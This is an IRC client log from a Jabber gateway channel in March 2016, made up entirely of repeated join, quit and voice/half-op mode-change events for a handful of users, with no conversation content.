has joined &jabber 2016-03-02 19:58:22 - Mode &jabber [+v error406_] by localhost 2016-03-02 19:58:22 - Mode &jabber [+h turtleshow] by localhost 2016-03-02 20:22:32 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-02 20:27:13 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-02 20:32:14 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-02 20:47:02 - irc: disconnected from server 2016-03-02 21:00:20 > fsociety (whoami@localhost) has joined &jabber 2016-03-02 21:00:20 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-02 21:00:31 > error406_ (error406@error418.info) has joined &jabber 2016-03-02 21:00:31 > gunter (gunter@error418.info) has joined &jabber 2016-03-02 21:00:31 > landi (landi@error418.info) has joined &jabber 2016-03-02 21:00:31 > jimk (jimk@error418.info) has joined &jabber 2016-03-02 21:00:31 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-02 21:00:31 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-02 21:00:31 > munin (munin@error418.info) has joined &jabber 2016-03-02 21:00:32 - Mode &jabber [+v error406_] by localhost 2016-03-02 21:00:32 - Mode &jabber [+h turtleshow] by localhost 2016-03-02 21:30:41 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-02 22:09:00 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-02 22:25:07 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 01:46:26 > fsociety (whoami@localhost) has joined &jabber 2016-03-03 01:46:26 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-03 01:46:37 > error406_ (error406@error418.info) has joined &jabber 2016-03-03 01:46:37 > gunter (gunter@error418.info) has joined &jabber 2016-03-03 01:46:37 > landi (landi@error418.info) has joined &jabber 2016-03-03 01:46:37 > jimk (jimk@error418.info) has joined &jabber 2016-03-03 01:46:37 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 01:46:37 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-03 01:46:37 > munin (munin@error418.info) has joined &jabber 2016-03-03 01:46:37 - Mode &jabber [+v error406_] by localhost 2016-03-03 01:46:37 - Mode &jabber [+v turtleshow] by localhost 2016-03-03 02:02:37 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-03 02:04:23 < error406_ (error406@error418.info) has quit (Leaving...) 2016-03-03 02:04:23 > error406_ (error406@error418.info) has joined &jabber 2016-03-03 03:01:49 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 03:01:49 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 03:02:23 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 04:53:56 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 04:53:56 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 04:54:10 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 06:36:15 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 06:36:15 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 06:36:39 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 07:06:05 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 07:20:01 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-03 07:45:48 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 08:04:46 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-03 08:11:18 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 08:11:18 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 08:11:48 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 08:48:38 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 08:48:38 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 08:48:46 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 09:10:43 - Mode &jabber [+h error406_] by localhost 2016-03-03 09:20:06 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 09:20:06 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 09:20:14 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 10:16:32 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-03 10:45:00 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 10:45:00 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 10:45:12 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 11:18:00 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-03 11:25:05 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 11:27:07 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-03 11:27:20 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-03 11:42:45 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-03 12:22:54 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 12:31:32 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-03 12:35:32 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 12:35:32 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 12:35:53 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 12:44:28 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 12:44:28 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 12:44:39 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 13:21:22 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 13:25:30 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-03 14:15:26 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-03 14:18:18 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 14:18:18 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 14:18:29 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 15:04:56 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 15:04:56 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 15:05:07 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 16:10:58 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 16:10:58 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 16:11:08 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 16:15:08 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-03 16:47:22 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 16:47:22 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 16:47:28 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 16:50:31 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 16:50:31 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 16:50:56 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 17:00:07 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 17:00:07 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 17:00:18 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 17:05:00 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 17:05:00 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 17:05:00 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 17:14:56 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 17:14:56 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 17:15:00 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 17:37:37 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 17:37:37 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 17:37:38 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 17:49:02 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 17:49:02 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 17:49:14 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 17:56:33 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-03 17:57:03 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-03 18:17:21 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-03 18:22:21 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 18:22:21 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 18:22:29 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 18:24:09 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 18:24:09 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 18:24:09 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 18:24:29 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 18:24:29 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 18:24:41 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 18:24:51 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 18:24:51 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 18:24:57 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 18:40:56 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 18:53:34 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-03 19:04:03 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-03 19:22:38 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 19:39:24 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-03 20:02:28 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 20:02:28 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 20:02:48 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 20:22:34 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 20:24:57 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-03 20:27:19 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-03 20:36:16 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-03 20:40:39 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 20:42:29 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-03 20:57:41 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 21:02:56 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-03 21:05:30 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-03 21:23:51 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-03 21:33:24 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 21:57:04 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 21:57:04 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 21:57:24 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 22:50:05 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-03 23:21:57 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-03 23:32:48 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 23:32:48 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 23:32:49 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 23:35:37 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 23:35:37 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 23:35:48 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 23:47:19 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-03 23:47:19 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-03 23:47:25 - Mode &jabber [+h turtleshow] by localhost 2016-03-03 23:51:14 < error406_ (error406@error418.info) has quit (Leaving...) 2016-03-03 23:51:14 > error406_ (error406@error418.info) has joined &jabber 2016-03-04 00:03:18 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 00:06:44 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-04 00:22:34 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 00:38:11 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-04 00:57:24 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 01:17:58 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 01:17:58 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 01:18:14 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 01:46:11 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 02:21:57 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 02:21:57 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 02:22:14 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 03:09:30 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 03:09:30 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 03:10:03 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 07:16:04 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 07:20:01 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-04 07:36:03 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 08:06:52 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-04 08:36:42 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 08:58:37 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-04 08:59:46 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 08:59:46 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 08:59:47 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 09:01:19 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 09:01:19 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 09:01:28 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 09:36:15 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 09:36:15 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 09:36:24 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 09:40:33 - Mode &jabber [+h error406_] by localhost 2016-03-04 09:51:50 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-04 09:52:36 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-04 09:56:55 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 09:56:55 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 09:57:05 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 10:12:48 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 10:41:17 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 10:41:17 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 10:41:45 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 11:06:25 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 11:06:25 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 11:06:26 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 11:23:21 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 11:24:47 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-04 11:38:12 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 11:38:12 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 11:38:18 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 12:13:46 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 12:13:46 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 12:14:06 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 13:17:02 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 13:27:03 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-04 13:38:01 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 13:38:01 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 13:38:02 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 13:55:23 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 13:55:23 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 13:56:02 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 14:12:18 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-04 14:12:52 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-04 14:24:04 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-04 14:25:26 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-04 14:54:12 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 14:54:12 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 14:54:13 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 14:55:15 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 14:55:15 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 14:55:20 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 15:08:25 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 15:08:25 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 15:08:34 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 15:43:15 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-04 15:45:24 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-04 15:57:07 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 15:57:07 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 15:57:21 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 16:10:38 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 16:10:38 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 16:10:39 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 16:18:04 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-04 16:20:38 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 16:20:38 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 16:20:46 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 16:30:26 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 16:30:26 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 16:30:27 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 16:31:45 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 16:31:45 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 16:31:45 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 16:31:54 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 16:31:54 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 16:31:57 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 16:32:35 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 16:32:35 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 16:32:35 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 16:32:40 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 16:32:40 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 16:33:10 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 16:33:14 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 16:33:14 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 16:33:24 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 16:34:56 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-04 16:39:56 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-04 16:45:14 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 16:45:14 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 16:45:23 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 16:46:50 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-04 16:47:04 < error406_ (error406@error418.info) has quit (Leaving...) 2016-03-04 16:47:04 > error406_ (error406@error418.info) has joined &jabber 2016-03-04 17:22:56 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 17:22:56 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 17:23:04 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 17:32:00 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 17:32:00 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 17:32:00 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 17:58:42 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 17:58:42 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 17:58:54 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 18:34:56 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 18:34:56 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 18:35:08 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 18:44:15 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 18:46:55 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-04 19:04:09 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 19:14:43 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 19:14:43 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 19:14:55 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 19:18:45 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 19:31:21 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-04 19:31:58 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 19:31:58 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 19:32:02 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 19:47:37 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-04 19:58:50 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-04 20:00:27 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 20:00:27 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 20:00:27 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 20:08:36 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 20:08:36 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 20:08:46 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 23:09:01 > fsociety (whoami@localhost) has joined &jabber 2016-03-04 23:09:01 - Channel &jabber: 2 nicks (2 ops, 0 halfops, 0 voices, 0 normals) 2016-03-04 23:09:07 > error406_ (error406@error418.info) has joined &jabber 2016-03-04 23:09:07 > gunter (gunter@error418.info) has joined &jabber 2016-03-04 23:09:07 > landi (landi@error418.info) has joined &jabber 2016-03-04 23:09:07 > jimk (jimk@error418.info) has joined &jabber 2016-03-04 23:09:07 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 23:09:07 > heeroyuy (heeroyuy@error418.info) has joined &jabber 2016-03-04 23:09:07 > munin (munin@error418.info) has joined &jabber 2016-03-04 23:09:08 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 23:17:25 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-04 23:17:25 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-04 23:17:36 - Mode &jabber [+h turtleshow] by localhost 2016-03-04 23:35:09 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 00:06:06 - Mode &jabber [+v error406_] by localhost 2016-03-05 00:08:02 < error406_ (error406@error418.info) has quit (Leaving...) 2016-03-05 00:08:02 > error406_ (error406@error418.info) has joined &jabber 2016-03-05 00:32:34 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 00:32:34 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 02:37:15 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 02:46:10 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 02:53:18 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 02:53:18 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 02:53:30 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 03:01:34 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 03:45:15 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 03:45:15 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 03:45:26 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 05:14:00 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 05:14:00 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 05:14:23 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 07:34:09 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 07:34:09 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 07:34:21 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 08:59:40 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 08:59:40 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 08:59:54 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 09:26:48 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 09:46:51 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 10:02:59 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 10:07:39 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 10:22:18 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 10:22:18 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 10:22:32 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 10:24:00 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 10:27:48 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 10:43:06 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 10:59:17 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 11:41:45 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 11:56:22 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 12:11:41 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 12:27:24 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 12:34:46 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 12:34:46 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 12:34:59 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 13:12:09 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 13:12:09 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 13:13:18 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 13:47:41 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 13:56:38 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 14:38:13 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 14:38:13 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 14:38:25 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 15:41:12 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 15:50:40 - Mode &jabber [+v error406_] by localhost 2016-03-05 15:51:44 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-05 15:59:34 - Mode &jabber [-h+v error406_ error406_] by localhost 2016-03-05 16:03:37 - Mode &jabber [+h-v error406_ error406_] by localhost 2016-03-05 16:04:42 < error406_ (error406@error418.info) has quit (Leaving...) 2016-03-05 16:04:42 > error406_ (error406@error418.info) has joined &jabber 2016-03-05 16:27:12 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 16:32:32 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 16:32:32 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 16:34:19 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 16:43:07 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 16:44:16 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 17:02:29 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 17:22:16 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 17:46:31 - Mode &jabber [-h+v turtleshow turtleshow] by localhost 2016-03-05 18:00:43 - Mode &jabber [+h-v turtleshow turtleshow] by localhost 2016-03-05 18:13:11 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 18:13:11 > turtleshow (turtleshow@error418.info) has joined &jabber 2016-03-05 18:13:24 - Mode &jabber [+h turtleshow] by localhost 2016-03-05 18:47:07 < turtleshow (turtleshow@error418.info) has quit (Leaving...) 2016-03-05 18:47:07 > turtleshow 